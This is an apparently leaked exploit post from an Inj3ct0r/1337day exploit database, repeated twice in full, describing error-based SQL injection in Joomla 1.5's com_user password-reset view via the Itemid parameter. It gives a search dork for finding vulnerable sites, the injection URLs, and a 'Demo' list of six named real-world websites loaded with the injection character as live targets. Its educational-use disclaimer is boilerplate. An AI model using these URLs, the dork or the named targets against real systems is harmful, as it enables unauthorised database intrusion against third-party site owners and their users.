Bài liên quan
**Joomla all v1.5 Error Based SQL Injection Vulnerability**
//...Leaked bY Anon Leaker..//
//..12.12.2012..//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ## 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
// Description :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid=' [/code]
Sql Injection to Joomla 1.5 :)
//...Leaked bY Anon Leaker..//
//..12.12.2012..//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ## 1
0 I'm Caddy-dz member from Inj3ct0r Team 1
1 ## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
// Description :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view : http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid=' [/code]
Sql Injection to Joomla 1.5 :)
Post a Comment